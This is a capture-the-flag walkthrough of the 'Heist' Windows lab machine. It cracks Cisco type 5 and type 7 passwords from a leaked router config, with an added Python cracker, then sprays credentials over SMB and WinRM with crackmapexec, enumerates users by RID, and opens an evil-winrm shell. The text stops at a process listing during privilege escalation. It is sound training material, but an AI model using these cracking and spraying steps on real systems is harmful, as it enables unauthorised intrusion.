Heist

Skills

  • Information Leakage
  • Cisco Password Cracker (password7)
  • SMB Enumeration - CrackMapExec
  • Getting more valid system users - lookupsid.py
  • Abusing WinRM - EvilWinRM
  • Creating a dump file of the Firefox process - Procdump64.exe (Windows Sysinternals)
  • Reading the password of the administrator user in the previously performed dump [Privilege Escalation]

Certifications

  • OSCP

Description

Heist is an easy Windows machine. On the website we find a Cisco config.txt containing several passwords; we crack and decode them and validate the results with crackmapexec, obtaining one valid credential. With it we enumerate the machine's local users and find a second valid credential that lets us connect over WinRM. Once inside, we dump the Firefox process and recover the Administrator user's credentials from it.


Reconnaissance

We check that the host is up and guess its OS from the TTL: Windows hosts usually answer with TTL 128, and here an intermediate hop decrements it by one, hence 127.

# ping 10.129.96.157
PING 10.129.96.157 (10.129.96.157) 56(84) bytes of data.
64 bytes from 10.129.96.157: icmp_seq=1 ttl=127 time=70.3 ms
64 bytes from 10.129.96.157: icmp_seq=2 ttl=127 time=62.4 ms
^C
--- 10.129.96.157 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 62.351/66.334/70.318/3.983 ms

Nmap

We run a full TCP port scan with nmap, reporting only open ports.

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.96.157 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 11:02 CEST
Initiating SYN Stealth Scan at 11:02
Scanning 10.129.96.157 [65535 ports]
Discovered open port 80/tcp on 10.129.96.157
Discovered open port 445/tcp on 10.129.96.157
Discovered open port 135/tcp on 10.129.96.157
Discovered open port 49669/tcp on 10.129.96.157
Discovered open port 5985/tcp on 10.129.96.157
Completed SYN Stealth Scan at 11:03, 26.36s elapsed (65535 total ports)
Nmap scan report for 10.129.96.157
Host is up (0.064s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.42 seconds
           Raw packets sent: 131084 (5.768MB) | Rcvd: 26 (1.224KB)

Next we run service and version detection against the open ports we found.

# nmap -sCV -p80,135,445,5985,49669 10.129.96.157 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 11:03 CEST
Nmap scan report for 10.129.96.157
Host is up (0.092s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-01T09:04:41
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.74 seconds

Web Enumeration

This is what we see when we access the website.

We are up against IIS 10.0 serving PHP 7.3.1; the root redirects to login.php.

# whatweb 10.129.96.157
http://10.129.96.157 [302 Found] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.96.157], Microsoft-IIS[10.0], PHP[7.3.1], RedirectLocation[login.php], X-Powered-By[PHP/7.3.1]
http://10.129.96.157/login.php [200 OK] Bootstrap[3.3.7], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.129.96.157], JQuery[3.1.1], Microsoft-IIS[10.0], PHP[7.3.1], PasswordField[login_password], Script, Title[Support Login Page], X-Powered-By[PHP/7.3.1]

Logging in as guest we can see several messages.

Clicking on attachments we find a config.txt file.

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

The enable secret is a type 5 hash (md5-crypt, the $1$ format): it cannot be decrypted, only cracked by guessing, but a lookup at https://hashes.com/en/decrypt/hash returns it straight away.

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Cisco type 7 passwords are reversible obfuscation rather than hashes (a fixed XOR key), so they decode instantly, for example at https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html

$uperP@ssword
Q4)sJu\Y8qz*A3?d
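Doing both steps offline avoids pasting credentials into third-party websites. The following Python script is an added example, not code from the original writeup: it reverses the type 7 obfuscation with the well-known fixed key and treats `enable secret 5` for what it is, md5-crypt, which can only be recovered by guessing. `CONFIG` is a constructed excerpt holding just the credential lines of the page's config.txt, and the two-word list stands in for a real wordlist.

```python
import hashlib
import re

# Constructed excerpt of the config.txt attachment: only the lines that carry secrets.
CONFIG = """\
hostname ios-1
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

# Cisco type 7 is not encryption: each byte is XORed with this fixed key,
# starting at the offset given by the first two decimal digits of the string.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco 'password 7' value to cleartext."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


# 'enable secret 5' is md5-crypt ($1$): one-way, so it can only be guessed offline.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: str, salt: str) -> str:
    """Classic FreeBSD/Cisco md5-crypt: returns the full $1$salt$hash string."""
    pw, slt = password.encode(), salt.encode()
    ctx = hashlib.md5(pw + b"$1$" + slt)
    alt = hashlib.md5(pw + slt + pw).digest()
    n = len(pw)
    while n > 0:                      # mix in alt, 16 bytes per chunk of password length
        ctx.update(alt[: min(16, n)])
        n -= 16
    i = len(pw)
    while i:                          # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):             # 1000 stretching rounds
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(slt)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    def to64(value: int, count: int) -> str:
        out = ""
        for _ in range(count):
            out += ITOA64[value & 0x3F]
            value >>= 6
        return out

    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in triples)
    encoded += to64(final[11], 2)
    return f"$1${salt}${encoded}"


def crack_md5crypt(hash_value: str, wordlist):
    """Offline dictionary attack on a $1$ hash; returns the password or None."""
    salt = hash_value.split("$")[2]
    for word in wordlist:
        if md5crypt(word, salt) == hash_value:
            return word
    return None


def harvest_config(config: str) -> dict:
    """Map every credential in an IOS config: type 7 decoded, enable secret kept as a hash."""
    creds = {}
    for m in re.finditer(r"^username (\S+) .*?password 7 ([0-9A-Fa-f]+)", config, re.M):
        creds[m.group(1)] = decode_type7(m.group(2))
    m = re.search(r"^enable secret 5 (\$1\$[^$]+\$\S+)", config, re.M)
    if m:
        creds["enable"] = m.group(1)
    return creds


if __name__ == "__main__":
    found = harvest_config(CONFIG)
    for name, value in found.items():
        print(f"{name}: {value}")
    # Constructed two-word list standing in for rockyou.txt.
    print("enable secret cracks to:", crack_md5crypt(found["enable"], ["cisco", "stealth1agent"]))
```

The takeaway for a defender is the asymmetry: `service password-encryption` protects nothing, since type 7 is reversed in microseconds, while the type 5 secret only fell because the password was in a public wordlist.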

We create a file called usernames with the names seen so far (rout3r and admin come from the config, hazard is the user who posted the ticket with the attachment).

rout3r
admin
secret
hazard

We create a file called passwords.

stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

SMB Enumeration

We spray the users and passwords against SMB with crackmapexec and obtain one valid pair.

# crackmapexec smb 10.129.187.132 -u usernames -p passwords --continue-on-success
SMB         10.129.187.132  445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 

With smbmap we can see which shares exist; we cannot connect with smbclient, mount anything, or download anything with smbmap. What stands out in the IPC$ listing is the ROUTER named pipe. Note that IPC$ holds named pipes, not files, and they already leak a lot: gecko-crash-server-pipe.788 and the chrome.788.* pipes belong to a running Firefox whose parent PID is 788, and the PSHost...wsmprovhost pipe shows an active PowerShell remoting host, all visible before we have a shell.

# smbmap --no-banner -u hazard -p stealth1agent -H 10.129.187.132 -P 445 -r 'IPC$'       
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                               
                                                                                                                             
[+] IP: 10.129.187.132:445	Name: 10.129.187.132      	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	./IPC$
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	lsass
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	scerpc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-358-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	epmapper
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-1d4-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	eventlog
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-410-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	atsvc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-544-0
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	wkssvc
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	spoolss
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-920-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	trkwks
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	W32TIME_ALT
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	srvsvc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-25c-0
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	vgauth-service
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	ROUTER
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-26c-0
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	gecko-crash-server-pipe.788
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.0.110417678
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.1.3306904
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.2.133918730
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.3.197230462
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.4.31441153
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.5.16809512
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.6.64447448
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.7.27000950
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.8.97120283
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.9.160051052
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.10.189681338
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.4212.0.5762653
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.11.128723749
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.12.38365861
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6248.0.52126038
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6248.1.205003119
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6248.2.179736250
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6248.3.120847887
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.13.3147152
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.14.93222472
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.15.204834613
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.16.207272103
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.17.54858477
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.18.149115058
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.19.202206245
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6444.0.163006652
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6444.1.205252133
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6444.2.90436775
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.20.69102692
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.21.26929209
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.22.57114521
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.23.168171150
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.24.37974430
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.25.39190752
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.788.26.197771899
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6688.0.159345674
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6688.1.56174452
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	chrome.6688.2.4265615
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	PSHost.133670253465516784.6620.DefaultAppDomain.wsmprovhost
[*] Closed 1 connections                                                                                                 

Since we now have valid credentials we can enumerate the machine's local users by brute-forcing RIDs with lookupsid.py. I tried enumerating domain users with crackmapexec but got none.

# impacket-lookupsid SupportDesk/hazard:stealth1agent@10.129.187.132
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.129.187.132
[*] StringBinding ncacn_np:10.129.187.132[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

We add the new users to the usernames file.

rout3r
admin
secret
hazard
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
Hazard
support
Chase
Jason

We validate the credentials against SMB again; Chase's password turns out to be the admin type 7 password from the router config.

# crackmapexec smb 10.129.187.132 -u usernames -p passwords --continue-on-success
SMB         10.129.187.132  445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.187.132  445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE

WinRM Enumeration

Port 5985 (WinRM) is open, so we spray the same credentials over WinRM with crackmapexec to see which user can actually open a remote shell. hazard's password is valid on SMB but is rejected by WinRM, which only admits members of Administrators or Remote Management Users; Chase's works, and the (Pwn3d!) tag means we get command execution.

# crackmapexec winrm 10.129.187.132 -u usernames -p passwords --continue-on-success
SMB         10.129.187.132  5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.129.187.132  5985   SUPPORTDESK      [*] http://10.129.187.132:5985/wsman
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\admin:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\secret:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\secret:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\secret:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\hazard:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\None:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Hazard:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\support:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword
WINRM       10.129.187.132  5985   SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d

Intrusion

We connect to the target with evil-winrm.

# evil-winrm -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d' -i 10.129.187.132  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase

Privilege escalation

On chase's desktop we find this note.

*Evil-WinRM* PS C:\Users\chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

We list the system's processes and notice that Firefox is running, which is odd on a server: an interactive browser session is worth a close look because it can hold credentials in memory.

*Evil-WinRM* PS C:\> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     2296       5380               360   0 csrss
    290      13     1980       4956               476   1 csrss
    357      15     3476      14460              4396   1 ctfmon
    253      14     3940      13348              3780   0 dllhost
    166       9     1864       9652       0.03   5700   1 dllhost
    614      32    29372      57384               956   1 dwm
   1491      58    23972      78428              5156   1 explorer
   1080      71   152744     230528       5.14    788   1 firefox
    347      19    10228      38556       0.05   4212   1 firefox
    401      34    35588      95060       0.72   6248   1 firefox
    378      28    22952      59916       0.28   6444   1 firefox
    355      25    16428      38760       0.13   6688   1 firefox
     49       6     1508       3776               768   0 fontdrvhost
